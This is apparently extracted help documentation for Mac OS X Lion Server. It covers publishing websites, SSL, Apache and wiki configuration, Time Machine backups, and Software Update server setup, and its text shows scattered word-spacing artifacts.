Web
Create w ebsites
Publish a website
You can create a website using web development software of your choice, or have someone do it for you, and then copy the webs ite files to your s erver. Then us e the Server app to publis h your websites . You can secure your website by enabling Secure Sockets Layer (SSL). You can create a self-s igned SSL certificate in the Server app, or use one from a certificate authority (CA). When you turn on web service, a default website is created and custom websites you create are enabled. This website responds to all server IP addres ses and hos t names on port 80. If you enable SSL, the default website responds to port 443, and a website on port 80 redirects everything to port 443. The webs ite initially us es a placeholder page that you can replace with your own. If you need a website to use a specific IP address, or if you want to change settings s uch as the host name, port, or access control, you can create custom websites. For example, you can create multiple custom websites with different hostnames , serving the same content by s haring the same document root folder. The websites you publish with the Server app are also known as virtual hosts. Create a custom website Use the Server app to publish a website. 1. In the Web pane of the Server app, click the Add button (+). A dialog with options appears. 2. Cus tomize your website using the following.
Setting Domain Name IP Address Description Enter the websites fully qualified domain name. If your server has multiple IP addresses, choose the IP address used to access the website. Store Site Files In Choose a folder on your local computer to store your website files. This folder should include an index.html or index.php file to act as your website homepage. To view the folder contents, click View Document Root Contents at the bottom of the setup dialog. Who Can Access Choose who can access folders in the website. By default, everyone
can access all folders. If you choose Customize, you can restrict access to subfolders of your website to groups you create in the Server app.
3. Click Done. 4. If web s ervice isnt turned on, click the On/Off switch to turn on the service. To change website settings after creating a custom website, select the website in the Web pane of the Server app and click the Edit button (pencil). You cant change the hos t name or document root folder settings . Add or change webpages on your website To change whats available on the website, change the files in your websites document root folder. Use the Server app to find your websites document root. The default document root is /Library/Server/Web/Data/Sites/domainname/. 1. In the Web pane of the Server app, select the website and click the Edit button (pencil). A dialog with options appears. The document root is shown in the Store Site Files In pop-up menu. 2. Click View Document Root Contents. The Finder opens to the document root location. Change the files in this folder to change whats available on the website.
RELATED TOPICS
Start or s top a service SSL certificates Use an SSL certificate
Web
Create w ebsites
Make websites and wikis more secure

You can enable Secure Sockets Layer (SSL) for websites and wikis to make them more secure. The s erver can us e an SSL certificate to identify itself electronically and communicate s ecurely with computers and other servers on the local network and the Internet. The SSL certificate provides additional s ecurity for websites and wikis. You can us e the s elf-signed certificate created for your s erver when you set it up, or a s elf-signed certificate you created, but users browsers wont trus t thes e and will display mess ages asking if the user trusts your certificate. You can avoid this by using a signed certificate. When you enable SSL for websites, it enables SSL for all web applications, such as wikis. The URLs for your websites and wikis start with https ins tead of http. If you go to the http URL for your website, you are redirected to the https version. Also, SSL websites use port 443, while non-SSL encrypted websites use port 80.
1. In the Server app, select your server (below Hardware on the left s ide of the Server application). 2. Click Settings, and then click the Edit button at the right of SSL Certificate. 3. Choose one of the following:
To do this Use an SSL certificate for iCal, Address Book, iChat, Mail, and web services Use an SSL certificate for just web service Choose Custom in the Certificate pop-up menu. In the list that appears, choose an SSL certificate from pop-up menu at the right of web service. Do this Choose a certificate from the Certificate pop-up menu.
RELATED TASKS
Web
Create w ebsites
Secure web content on case-insensitive file systems

Use case-sensitive disk volume formats such as Mac OS Extended (Case-sensitive) or Mac OS Extended (Case-sensitive, Journaled) to serve access -controlled web content. In these volume formats , folders named Protected and PrOtECted are two different folders. The Mac OS Extended volume format preserves the case of file names but does not distinguis h between a file or folder named Protected and one named PrOtECted. The mod_hfs_apple module, which is enabled by default, prevents using case insensitivity to bypass s ecurity. Without mod_hfs_apple, this insensitivity could be an iss ue when your web content resides on this type of volume and you are attempting to restrict access to all or part of your web content. If you require browsers to use a name and a pas sword for Read-Only acces s to content in a folder named Protected, browsers must authenticate to acces s the following URLs: http://example.com/Protected http://example.com/Protected/s ecret http://example.com/Protected/s ECreT Without the mod_hfs_apple module enabled, they could bypass it by using something like the following: http://example.com/PrOtECted http://example.com/PrOtECted/secret http://example.com/PrOtECted/sECreT Note: The mod_hfs_apple module operates on folders. It is not intended to prevent access to individual files. A file named secret can be access ed as seCREt. This is correct behavior, and doesnt enable bypassing s ecurity. For information about choosing who can acces s secure web content, see Publish a website.
Web
Create w ebsites
Let users change their password

If you host a webs ite and have an SSL certificate ass ociated with web service, you can enable a web page that users can use to change their pass word. If you enable wiki service, a Change Pass word link appears at the bottom of the default wiki server home page. The change pas sword page is located at https://websiteURL/changepass word.
1. In the Web pane of the Server app, select a website and click Edit (pencil). 2. Select "Allow users to change their pass word." If "Allow users to change their password" is deactivated, you don't have an SSL certificate associated with web service. For information about using SSL certificates , see Using an SSL certificate. 3. Click Done. 4. If web s ervice isnt turned on, click the On/Off switch to turn on the service.
RELATED TASKS
Host wikis on your s erver
Web
Work w ith open source applications
Work with Apache

Apache is the open source HTTP web s erver provided with Mac OS X Lion. You can use Server Utility to manage web service and use the default Apache settings. To change advanced Apache settings , edit Apache configuration files and change or add Apache modules .
Mac OS X Lion runs Apache web s erver v2.2 as a 64-bit process on 64-bit computers . In a clean installation of Mac OS X Lion Server, Apache v2.2 is ins talled. If you are using Apache v1.3 on Mac OS X Server v10.5 and you upgrade to Mac OS X Lion, Apache 2.2 is installed using its default configuration, and your Apache v1.3 configuration files are preserved in the /etc/httpd-1.3/ folder. You can migrate Apache us ing one of the following methods: Use the apache1_config_helper s cript to help automate the Apache v1.3 to v2.2 migration. Use a text editor to customize the Apache configuration. The locations of key Apache files and folders are listed in the following table.
File or folder Web service configuration files Main web service configuration file Website configuration files Template for new websites created in the Server app Web application configuration files Executable file Web modules Error log Location /etc/apache2/ /etc/apache2/httpd.conf /etc/apache2/sites/ /etc/apache2/sites_disabled/ uid _default_default.conf /etc/apache2/webapps/ /usr/sbin/httpd /usr/libexec/apache2/ /var/log/apache2/ (with a symlink that lets the folder be viewed as /Library/Logs/WebServer/) Temporarily disabled websites Static content CGI files /etc/apache2/sites_disabled/ /Library/Server/Web/Data/Sites/Default/ (default) /Library/WebServer/CGI-Executables/
Files in /etc/apache2/sites/ are read and process ed by Apache when it performs a hard or soft (graceful) restart. You disable sites by moving them from /etc/apache2/s ites / to /etc/apache2/sites_disabled/ and restarting web s ervice. Each time you save changes , the server restarts. If you edit a file using a text editor that creates a temporary or backup copy, the server restart might fail becaus e two files with almost identical names are present. To avoid this problem, delete temporary or backup files created when editing files in this folder. For information about important Apache configuration files , see the ReadMe.txt file in /etc/apache2/. For Apache web s erver v2.2 documentation, see http://httpd.apache.org/docs/2.2/. For information about web application configuration files , enter man webapp.plist in Terminal.
Web
Enable or disable PHP

You can enable or dis able PHP for websites using the Server app. You can write PHP scripts to create dynamic web content or web applications.
1. In the Web pane of the Server app, select "Enable PHP web applications" to enable PHP or deselect "Enable PHP web applications" to disable PHP. If webmail is turned on, PHP is enabled and can't be disabled. 2. If web s ervice isnt turned on, click the On/Off switch to turn on the service.
RELATED TASKS
Enable Webmail
Web
Restore the default web configuration

You can restore the default Apache configuration without reinstalling Mac OS X Lion. The folders with Apache configuration files have read-only .default files that store default Apache s ettings . You can run a command in Terminal that replaces all changed configuration files with these default files. For information about important Apache configuration files , see the ReadMe.txt file in /etc/apache2/.
1. Open Terminal. 2. Enter the following command: $ sudo serveradmin command web:command=restoreFactorySettings
Web
Work with web applications

Web service allows you to run web applications and web application frameworks such as MacRuby and Ruby on Rails. Mac OS X Server v10.6 us ed a Mongrel server to support Ruby on Rails applications. Mac OS X Lion uses control_tower for MacRuby and the Thin web s erver for Ruby on Rails. For information about control_tower, enter man control_tower in Terminal. For information about the Thin web server, see the Thin web site at code.macournoyer.com/thin/. For a list of Thin web server options , enter thin in Terminal. In addition to using the Server app, you can start or s top web service and configure web service settings by using the servermgr_web and webappctl commands . For information about these commands , enter man servermgr_web and man webappctl in Terminal. You can define the web applications managed by s ervermgr_web by editing plis t files located in /etc/apache2/webapps/. For information about these plist files, enter man webapp.plist in Terminal.
Web
Manage w eb modules
About Apache web modules

Apache includes modules that add functionality to your website. Apache comes with several standard modules, and you can purchase additional modules from software vendors or download them from the Internet. You can find information about available Apache modules at www.apache.org/docs/mod. Before enabling or disabling modules , you should have a specific functionality goal and fully understand the implications. Some web modules are mutually exclusive or are interdependent. Here are some examples : auth_digest_module and digest_module must never be enabled s imultaneous ly. proxy_module must be enabled if proxy_connect_module, proxy_ftp_module, proxy_http_module, proxy_ajp_module, or proxy_balancer_module are enabled. dav_module and dav_fs_module should be in the same state. mod_dav_svn requires that mod_dav and mod_dav_fs are enabled. encoding_module requires that headers_module, dav_module, and dav_fs_module are enabled. cache_module is required for mem_cache_module and disk_cache_module. mod_userdir is disabled by default. mod_userdir_apple, a secure replacement for mod_userdir, does not distinguish between nonexis tent us ers and us ers who cannot access userdir. mod_userdir_ apple is also disabled by default. When mod_userdir and mod_userdir_apple are disabled, a brows er cant acces s content from a users Sites folder. For
example, if your server is named example.com and the us ers short name is refuser, the content of the Sites folder can no longer be acces sed at http://example.com/~refus er. mod_userdir and mod_userdir_apple mus t never be enabled simultaneously. mod_bonjour is disabled by default, but requires at leas t one of the two mod_userdir modules for full functionality.
Web
Manage w eb modules
About the mod_encoding module

The open source mod_encoding module adds WebDAV s upport for non-ASCII file names. To support non-ASCII file names, you must enable mod_encoding and dav_module. By default, mod_encoding is disabled. The module is installed and configuration directives are present in the Apache config file. These arent activated because the LoadModule and AddModule directives that inform Apache about mod_encoding are disabled. The Apache configuration file contains a specific set of configuration directives that should be sufficient for most needs. To modify directives you must use a text editor and edit the /etc/apache2/httpd.conf file. mod_encoding supports the following s erver configuration directives : EncodingEngine directive This directive enables and disables mod_encoding. Correct operation of mod_encoding als o requires that the special version of mod_dav, mod_ dav_encoding, be enabled as well.
Syntax Default Off
EncodingEngine [ on | off ]
AddClientEncoding directive Although WebDAV clients are expected to send data in UTF-8 or any other properly detectable style, some clients send data in non autodetectable platform-local encoding, thus requiring this directive, which maps encoding names to client types. This directive specifies encodings expected from each client type. The clients are identified by agent name. The agent name can be specified as a pattern using extended regexp. Never use .* for agent name. Ins tead, use DefaultClientEncoding. This module uses CoreFoundations CFString and supports all encoding supported by it. In general, IANA-regis tered encoding names are s upported.
Syntax Default None
AddClientEncoding agent-name encoding [encoding...]
DefaultClientEncoding directive This directive tells the default s et of encodings what to expect from various clients . You dont need to specify UTF-8 because it is the default.
Syntax Default UTF-8
DefaultClientEncoding encoding [encoding...]
NormalizeUsername directive This directive is introduced to s upport the behavior of Windows XP when accessing a password-protected resource. Windows XP clients prepend hostname\ to the real username. Enabling this option strips off the hostname\ part, so only real username is pas sed to the authentication module.
Syntax Default Off
NormalizeUsername [ on | off ]
Web
Manage w eb modules
About Macintosh-specific web modules

By default, web service includes several Macintosh-specific web modules. mod_auth_apple This module provides basic authentication. This is based on Apaches mod_auth_bas ic but is modified to use Open Directory rather than htaccess files . mod_hfs_apple This module requires users to enter URLs for Mac OS Extended volumes using the correct case (lowercas e or uppercase). This module adds security for cas e-ins ens itive volumes. mod_auth_digest_apple This module provides a newer form of digest authentication when possible. This is based on Apaches mod_auth_diges t but is modified to use Open Directory rather than htdiges t files . It is disabled by default because it requires that the Open Directory master use Mac OS X v10.6 or later. mod_digest_apple This module provides an older form of digest authentication. This is bas ed on Apaches mod_digest but is modified to use Open Directory rather than htdigest files. mod_spnego_apple This module provides Kerberos authentication for Open Directory users using the SPNEGO/Negotiate protocol. mod_encoding This module allows WebDAV files to include Japanese characters in their names . Apple customized this open s ource module and modified WebDAV module mod_dav. mod_bonjour This module allows administrators to control how websites are registered with multicast DNS.
Web
Manage w eb modules
About open source component modules

In addition to the large set of plugin modules distributed with the Apache web server, and the custom plugin modules developed by Apple, web s ervice includes the following open s ource plugin modules. mod_jk This module allows proxied acces s to Java Servlets and JavaServer Pages through the web s erver. This module is disabled by default. php5_module, also known as libphp5.c This module enables PHP Hypertext Preprocess or (PHP). You can use PHP to deliver dynamic web content by using a server-side, HTML-embedded scripting language resembling C. Like the other two language modules (mod_python and mod_perl), this module allows scripts to run in Apaches addres s space, which is much fas ter than running them s eparately as CGIs . This module is disabled by default but is enabled when you enable Webmail in the Server app. For more information about this module, see www.php.net/. mod_perl This module integrates the Perl interpreter into the web server, letting exis ting Perl CGI s cripts run without modification. This integration means that the scripts run faster and consume fewer sys tem resources . This module is disabled by default. For more information about this module, see perl.apache.org/. mod_encoding
This module adds WebDAV support for non-ASCII file names. This module is disabled by default. For more information about mod_encoding, see About the mod_encoding module. mod_xsendfile This module is a small Apache2 module that proces ses X-SENDFILE headers registered by the original output handler. If it encounters the pres ence of such a header, it discards all output and s ends the file specified by that header instead, us ing Apache internals and including all optimizations like caching-headers and sendfile or mmap if configured. It is useful for process ing script output of PHP, Perl, or other CGI programs. This module is disabled by default, but is enabled when Wiki starts. For additional information about mod_xsendfile, download a vers ion and read additional documentation provided in the source distribution from tn123.org/mod_xsendfile/. mod_python This module allows you to write web-based applications in Python that run much faster than traditional CGI scripts. It also provides the ability to retain database connections and other data between hits and access to Apache internals. For additional information about mod_python, download your own vers ion and read additional documentation provided in the source distribution from www.modpython.org/.
Wiki
About wiki service

Wiki service lets you host content-rich webs ites that users can easily edit in their web brows ers. Wiki service is a standalone service that doesnt require web service. Wiki service hos ts web clients for Podcas t service. Turn on Podcas t service, and the wiki s ervice turns on a web client for it. When us ers connect to the wiki server, they can create wikis, which can include user-created pages, uploaded files, a blog, and a calendar. All users have pers onal webs ites called My Page, which they can use to create pages and blog posts, and upload files. Users set acces s permis sions for their own wikis, and for their pages and files in My Page. Users can give access privileges to other users and groups on your network server or other connected network servers. In the Server app, you can choos e which us ers are allowed to create wikis . For information about working with wikis, pages, files, and calendars , see Wiki Help. To access Wiki Help from any wiki page, choose Help from the Action pop-up menu.
RELATED TOPICS
Host wikis on your s erver Choose group s ervices
Wiki
Share information using wikis

When you turn on wiki s ervice, you can us e wikis to easily share information with your friends, family, and coworkers . A wiki is a collection of pages and files that a group of people can view and add to. Traditional webs ites have webmasters and content producers who create content for others to view. When you create a wiki, you choose who can create and edit content. You can use wikis as an intranet for your organization or team, an information hub for a community group, or as a place to share information with your family and friends. Wikis can be viewed in any web browser, and on iOS devices such as iPad, iPhone, and iPod touch. You can create and edit wiki content on your computer using any web browser that supports modern web technologies.
With a few clicks , you can create wikis , choos e who can view and edit them, and create and edit wiki pages. Configure wiki service In the Server app, you can set up your server to host wikis.
You can allow all us ers in your directory and connected directories to create wikis or you can res trict wiki creation. Users who create wikis can s et access privileges , including who's allowed to own, edit, or just view their wikis. 1. In the Wiki pane of the Server app, choose an option from the "Wikis can be created by" pop-up menu. To allow all users in your local directory, on your network s erver, and on connected network s ervers to create wikis, choose "all users" from the "Wikis can be created by" pop-up menu. Click the On/Off switch the service, and you're done. To restrict who can create wikis , choose "only s ome users ," and continue following this tas k. 2. If you chose "only some users," use the dialog to give or remove access for us ers and groups.
To do this Give access to a user or group Do this Click the Add button . Enter the name of a user or group in the new
next to Wiki to turn on
entry that appears. As you type, the Server app searches for a matching user or group. If the user or group you want to give access to appears, select the name from the list. Remove access from a user or group
Select a user or group and click the Remove button
3. Click OK. 4. If wiki service isnt turned on, click the On/Off switch Create a wiki 1. If you're not logged in to the wiki server, click the Log In button 2. Click the Create pop-up menu and choose New Wiki. , enter your user name and password, and then click Log In. next to Wiki to turn on the s ervice.
3. In the "Create a new wiki" dialog, enter a name for the wiki and a description. You can later change the name of the wiki. The des cription is shown when users click the Info button name in the Wikis page. next to the wiki's
4. Click Upload Image, and then select an image that represents the wiki. The icon is shown next to the wiki name, and in the Wikis page. The image you upload is res ized and stretched. Choose a 48 by 48 pixel image if you don't want the image to change. 5. Click Next. 6. In the "Set wiki access " dialog, give people or groups access to the wiki by entering their names in the field above the list of us ers and groups. As you type, the wiki server s earches for matching names. Click a name to add it to the acces s list. 7. Use the pop-up menus to change acces s permissions as sociated with each person or group. Here are the options you can choose:
Option Owner Read & write Read No access Description Can change wiki settings, and read and write content. Can read and write content. Can read content. Can't read or write content. By default, anyone not in the access list has no access.
8. Click Create. Create a wiki page 1. While viewing a wiki, click the Create pop-up menu , and then choose "New Page in 'wiki name.'"
If "New Page in 'wiki name'" does n't appear, you don't have permission to create pages in the wiki you're viewing. If you're viewing one of your My Page pages , instead of "New Page in 'wiki name'," a "New Page in My Documents" link appears. Click this link to create a s tandalone document. 2. Enter the name of the page, and then click Add. Edit a wiki page 1. If you're not logged in to the wiki server, click the Log In button , enter your user name and password, and then click Log In.
2. If you're viewing a blog and not a single blog post, click the title of a blog post to view it. You can't edit a blog post while viewing the entire blog. 3. While viewing the wiki page or blog post you want to edit, click the Edit button in the navigation toolbar.
If you don't have permission to edit the wiki page or blog pos t, the Edit button is deactivated. After you click the Edit button, the editing toolbar replaces the navigation toolbar. 4. To change the page's title, click the page's title and edit it. 5. Enter text in the body of the wiki page or blog post, and use the editing toolbar. The editing toolbar includes the following:
Click this To do this Insert a file.
Insert a picture.
Insert a movie or audio file.
Insert a table.
Insert a block of HTML, in which you can embed elements of other sites, like YouTube.
Change the paragraph style for the paragraph the pointer is in.
Change the text style for the selected text.
Insert a link to another wiki page or blog post, or to another website.
Change alignment for the selected paragraphs to left, center, right, or justified. Change whether selected paragraphs are a bulleted or numbered list.
Indent or outdent the selected paragraph or list item.
Cancel all editing changes.
Save all editing changes.
6. When you finish editing the page, click the Save button.
Wiki
Host wikis on your server

In the Server app, you can set up your server to host wikis.
You can allow all us ers in your directory and connected directories to create wikis or you can res trict wiki creation. Users who create wikis can s et access privileges , including whos allowed to own, edit, or view their wikis. They can grant access privileges to users in your local directory, on your network server, and on connected network servers .
1. In the Wiki pane of the Server app, choose an option from the "Wikis can be created by" pop-up menu. To allow all users in your local directory, on your network s erver, and on connected network s ervers to create wikis, choose "all users" from the "Wikis can be created by" pop-up menu. Click the On/Off switch the service, and you're done. To restrict who can create wikis , choose "only s ome users ," and continue following this tas k. 2. If you chose "only some users," use the dialog to give or remove access for us ers and groups.
To do this Give access to a user or group Do this Click the Add button . Enter the name of a user or group in the new
next to Wiki to turn on
entry that appears. As you type, the Server app searches for a matching user or group. If the user or group you want to give access to appears, select the name from the list. Remove access from a user or group
Select a user or group and click the Remove button
3. Click OK. 4. If wiki service isnt turned on, click the On/Off switch next to Wiki to turn on the s ervice.
RELATED TOPICS
About wiki service Choose group s ervices
Wiki
Configure wiki authentication settings

You can change wiki authentication settings such as the redirect path, security requirements, login expiration, and type of authentication used. You can change wiki authentication settings by editing /etc/collabd/webauthd.plist. Redirect path When a us er tries to view a wiki page with restricted access and the user hasn't logged in yet, the page loads after logging in. If the user tries to go to http://wikiserverurl /auth, the user is as ked to log in. After logging in, the user is redirected to the path you set. Change the redirect path by editing this key:
Key
Default
Description
default_redirect_url_path
/wiki
Change /wiki to the location in http://wikiserverurl / you want to send users to.
Security requirements Wiki service includes several s ecurity options . The s ecurity_requires list includes these options :
Key
Default
Description
security_requires
This list contains these options: same_host web_scheme whitelist_only
T he list can contain these options: logout_requires_token same_host web_scheme whitelist_only
You can enable any or all of the following options by adding them to the security_requires lis t:
Option
Description
logout_requires_token
T o log out, the wiki needs to provide a logout_token with a value that is a hash of the user's unique identifier with a shared secret.
same_host
Requires that the redirect goes to the same host that the login or logout request came from.
web_scheme whitelist_only
Requires that the redirect can only go to http:// or https://. Requires that the redirect can only go to a list of top level URLs defined in /etc/collabd/redirect_whitelist.plist.
Login expiration Several s ettings are related to how long users stay logged in before being logged out. When users log in, they're pres ented with a
Remember Me checkbox, which when s elected can save the users login credentials for a customizable period of time. If users clear the browser's cookies, their login credential timers are reset. Change login expiration settings by editing these keys:
Key
Default
Description
loginExpirySeconds
1209600
Set this to how long a user stays logged in if the user selects the Remember Me checkbox. T he default is 2 weeks (entered in seconds).
forgetMeExpirySeconds
86399
Set this to how long a user stays logged in if the user doesn't select the Remember Me checkbox. T he default is 2 weeks (entered in seconds).
enableRememberMe
true
Set this to true to enable the Remember Me checkbox. Set this to false to disable the Remember Me checkbox.
rememberOnByDefault
true
Set this to true to select the Remember Me checkbox by default. Set this to false to deselect the Remember Me checkbox by default.
Authentication You can choos e what kind of authentication is us ed by editing this key:
Key Default Description
authenticator
digest
You can set this to: digest plaintext Digest authentication is more secure than plain text authentication.
Wiki
Configure wiki service settings

You can change wiki service settings by editing plist files. You can change the following settings by editing /etc/collabd/collabcored.plist:
Key
Default
Description
collabd_url webauth_url use_inline_webauth
http://localhost:4444/ http://localhost:8086/auth true
Set this to the server running collabd. Set this to the server running webauth. Set this to true to use an inline dialog for authentication. Set this to false to redirect the browser to the webauth URL.
use_sandbox_server
true
Set this to true to use a sandbox server. Set this to false to bypass the sandbox server. Setting this to false is a security risk due to XSS issues.
sandbox_path quicklook_conf_path
/cc-sandbox /etc/collabd/quicklook.plist
Set this to the location of sandbox downloads. T his plist file lists all file extensions can users can use the Quick Look feature on.
disable_people_view
false
Set this to true to disable the People page in the wiki. Set this to false to enable the People
page in the wiki. disable_projects_view false Set this to true to disable the Wikis page in the wiki. Set this to false to enable the Wikis page in the wiki. max_attachment_file_size 524288000 Set this to the number of bytes allowed for uploaded files and media. T he default is 500 MB (in bytes).
You can change the following settings by editing /etc/collabd/collabd.plis t:
Key
Default
Description
LogFilePath LogLevel
/var/log/collabd/collabd.log warning
Set this to where collabd writes its log to. Set this to the level of items being logged. You can set this to any of the following: emergency alert critical error warning notice info debug Setting this to debug provides the most information, but it can use a lot of hard disk space.
FileDataPath
/Library/Server/Wiki/FileData
Set this to where uploaded files are stored. This path must have read and write access by the _teamsserver user and read access by the _www user.
FiltersEnabled
true
Set this to true to filter potentially malicious HTML. Set this to false to allow use of all HTML. Allowing all HTML is a large security risk.
AutolinkEnabled
true
Set this to true to link URLs in wiki pages. Set this to false to disable automatic linking.
Hardw are administrativ e serv ices
Time Machine serv ice
Provide a Time Machine destination

Time Machine service offers a backup destination on your server to Time Machine us ers. Us e the Time Machine pane of the Server app to make server disk space available for backing up users computers, or to change the disk used for s toring user backups. Time Machine service is available to users with Mac OS X Lion, Snow Leopard, and Leopard. Mac OS X Lion and Snow Leopard users who havent s elected a backup disk in the Time Machine pane of System Preferences are automatically asked whether they want to use the server as a s torage location. Other users need to open the Time Machine pane of System Preferences and change the backup dis k.
1. In the Server app s idebar, s elect Time Machine. 2. Click the On/Off switch to turn on Time Machine service. 3. Select a disk to use as the destination for users backups, and then click Use for Backup. Time Machine service creates the Backups shared folder on the dis k you s elect.
4. To choose a different disk as the backup destination, click Edit. If you turn on Time Machine s ervice when file sharing service is off, file sharing service turns on automatically. If you change the backup disk, users Time Machine preferences that were set to use the s erver for backup s torage will automatically begin using the Backups folder in its new location. After selecting a different backup dis k, advise users that their first backup will take longer because its a full backup. Time Machine service does nt copy us ers backup data from the old Backups folder to the new Backups folder. You can control each users acces s to the servers Time Machine backup storage in the Users pane of the Server app.
RELATED TOPIC
Time Machine serv ice
If the server runs out of space for backing up users Macs

If the server runs out of space for backing up users Macs, you can connect another dis k to the s erver and make it the storage location in the Time Machine pane of the Server app. Us ers whos e Time Machine preferences were set to use the s erver for backup s torage will automatically begin using the servers new backup disk. After selecting a different backup dis k, you should advise us ers that their firs t backup will take longer becaus e its a full backup. Time Machine service doesnt copy us ers backup data from the old backup disk to the new backup disk.
RELATED TOPIC
Provide a Time Machine destination
Softw are Update
Software Update
Software Update offers you ways to manage Macintosh software updates from Apple on your network. In an uncontrolled environment, users might connect to Apple Software Update servers at any time and update their computers with software that is not approved by your IT group. Using local Software Update servers, your client computers access only the s oftware updates you permit from s oftware lists that you control, improving your ability to manage computer s oftware updates . For example you can: Download software updates from Apple Software Update servers to a local server for s haring with local network clients and reduce the amount of bandwidth used outside your network. Direct us ers, groups, and computers to specific local Software Update s ervers using managed preferences. Manage the software update packages users can access by enabling and dis abling packages at the local server. Mirror updates between Apple Software Update servers and your server to make sure you have the most current updates. Note: Software Update does not update s oftware on the server. For information about keeping your server software current, see Server Admin Help. Note: You cant us e Software Update to provide third-party s oftware updates . The process that starts Software Update is swupd_syncd. When you s tart Software Update, it contacts Apples Software Update server and reques ts a list of available software to download locally. You can copy (store packages locally) and enab le (make the packages available to users) any files in the lis t. You can also limit user bandwidth for updates and choose to automatically copy and enable newer updates from the Apple server. Note: Software Update stores its configuration information in the /etc/swupd/s wupd.conf file. Catalogs When Software Update starts, your Software Update server receives a list of available software updates from the Apple Software Update s ervice. Your server synchronizes the contents of the software catalog with Apples Software Update server when you restart your s erver or when you enter the following command:
$ sudo -u _softwareupdate /usr/sbin/swupd_syncd -sync WARNING: It is not recommended to refresh the service using the swupd_syncd daemon directly. Doing so can change the file permissions of downloaded updates, making future sync operations fail. If you must sync us ing swupd_syncd directly, use the -u option with the _softwareupdate user name to prevent the changing of file permiss ions. To manually update the catalog, select the Refresh button in the Updates pane of Software Update settings. Changes in the Apple published catalog are immediately reflected on your local s erver. Deprecated s oftware packages are disabled when a replacement package for that update is enabled. An adminis trator can disable the new software package and continue offering the deprecated package. Installation packages Software Update supports pkm.en and .tar file types, recognized only by Mac OS X v10.4 and later. As you copy updates on your server, your server downloads and s tores update packages in the /var/db/swupd/ folder. This path can be modified to store the packages in an alternate location. Note: Lion Server supports only Apple-s pecific software packages for us e with your update s erver. Modified Apple and third-party update software packages cannot be shared. After packages are copied locally, you can enable them for us ers to update their s oftware. Mac clients running Software Update see only enabled packages in the list of available software for their computer. Deprecated software packages are disabled when a replacement package for that update is enabled. An adminis trator can disable the new software package and continue offering the deprecated package. Stay up-to-date with the Apple Server To keep your s ervice synchronized with the most current information, your Software Update s erver must always remain in contact with the Apple server. Software Update service regularly checks with Apple Software Update to update us age information and send lists of newly available software to the updates catalog on your server as they become available. The Apple Software Update s erver executes the swupd_syncd synchronization daemon to make sure the latest update packages are available. The scheduled execution of swupd_syncd is controlled by launchd by means of the StartCalendarInterval setting at /System/Library/LaunchDaemons/com.apple.swupdate.sync.plist. Limit user bandwidth Software Update lets you limit the bandwidth that client computers can use when downloading software updates from your Software Update server. Setting a limit on the bandwidth enables you to control traffic on your network and prevents Software Update clients from slowing the network. For example, if you limit the bandwidth to 56 Kbps, each s oftware update client can download updates at 56 Kbps. If five clients connect simultaneously to the server, the total bandwidth used by the clients will be 280 Kbps (56 Kbps x 5). Limit Software Update server bandwidth A new feature in Lion Server Software Update s erver is the syncBandwidth. This feature can be used to limit the server's bandwidth back to Apple. Similar to the user bandwidth limit s etting, it's value is expres sed in KBytes/second (for example, 1024 = 1048576 Bytes/second). Setting a limit on the server's bandwidth enable you to minimize impact of the Software Update server on your organizations limited external bandwidth. Revoked files On a rare occasion Apple might provide a s oftware update and want to revoke or deprecate a package from circulation. If Apple revokes the update package, the package is removed from your catalog and stored packages , making it unavailable to clients. If Apple deprecates a software package and provides a replacement package, the older software package is dis abled, making it unavailable to clients. The package remains in your catalog and stored packages until you remove it. An administrator can disable the new software package and continue offering the deprecated package. Software Update package format You cant make your own Software Update packages. For security considerations and to protect from attackers faking packages, the Software Update package installer wont install a package unless it is signed by Apple.
In addition, Software Update works only with the package format supported in Mac OS X Server v10.4 or later. Log files The log files for Software Update are located in the /var/log/swupd/ folder. The log files record Software Update events as they occur. The log files for Software Update include the following: swupd_s yncd_log: logs the swupd_syncd daemon swupd_error_log: reports mes sages from the httpd daemon controlled by Software Update swupd_access_log: reports mess ages from the httpd daemon controlled by Software Update The logs can be viewed in Server Admin in the Software Update Logs panel or us ing the Cons ole application located in the /Applications /Utilities/ folder. Collected information The Apple Software Update s erver collects the following information from client Software Update servers: Language Type Browser
Softw are Update
Tools for managing Software Update

The Workgroup Manager and Server Admin applications provide a graphical interface for managing Software Update in Lion Server. In addition, you can manage Software Update from the command line by us ing Terminal. Server Admin Server Admin provides acces s to tools you use to set up, manage, and monitor Windows services and other services. You use Server Admin to: Set up Mac OS X Server as a Software Update server. For instructions, see Configure Software Update general settings. Manage and monitor Software Update s ervice. For more information about using Server Admin, see Server Admin Help: Opening and authenticating in Server Admin Working with s pecific servers Administering services Using SSL for remote s erver administration Server Admin is installed in /Applications/Server/. Workgroup Manager Workgroup Manager provides comprehensive management of clients of Mac OS X Server. You use Workgroup Manager to set preferences by us er, group, or computer to access your Software Update server. For more information about how to configure managed preferences for the Software Update server, see Workgroup Manager Help. For information about using Workgroup Manager, see Workgroup Manager Help. This includes: Opening and authenticating in Workgroup Manager Administering accounts Customizing the Workgroup Manager environment Workgroup Manager is installed in /Applications/Server/. Command-line tools A full range of command-line tools is available for administrators who prefer to us e command-driven server administration. For
remote s erver management, submit commands in a secure shell (SSH) s ession. You can enter commands using the Terminal application, located in the /Applications/Utilities / folder.
Softw are Update
Set up Softw are Update
Software Update set up overview

Here is an overview of the basic steps for configuring your Software Update server. This includes setting up Software Update service, configuring client computer access to the server, and tes ting. Evaluate and update your network, servers, and client computers as necessary The number of client computers you can support using Software Update is determined by the number of servers you have, how theyre configured, hard dis k storage capacity, and other factors . See Considerations and requirements. Depending on the res ults of this evaluation, you might want to add servers or hard disks, add Ethernet ports, or make other changes to your servers. For your client computers to us e the local Software Update service, you mus t update them to Mac OS X v10.4 or later. Create your Software Update service plan Decide which users will access Software Update. You might have groups who need unlimited access while others might need a more limited choice of s oftware updates . Such a plan requires more than one Software Update server with client computers bound us ing directory services to manage user preferences. Configure the Software Update server Decide how to copy and enable software updates from Apple: automatically or manually. Set the maximum bandwidth you want a single computer to us e when downloading update packages from your server. See Configure Software Update general s ettings. Start Software Update Your server synchronizes with the Apple Software Update server by reques ting a catalog of available updates . If you chose to automatically copy updates , your s erver will download all available software update packages. See Start Software Update. (Optional) Manually copy and enable selected packages If you do not choose to automatically copy and enable all Apple software updates, you mus t manually select software update packages to copy and enable. See Copy and enable selected updates from Apple. Set up client computers to use the correct Software Update server Set preferences in Workgroup Manager by us er, group, or computer to access your Software Update server. For more information about how to configure managed preferences for the Software Update server, see Workgroup Manager Help. Test your Software Update server setup Tes t Software Update by requesting software updates from the server using a client bound to preferences you set in Workgroup Manager. Make sure the packages are acces sible to your users.
Softw are Update
Considerations and requirements

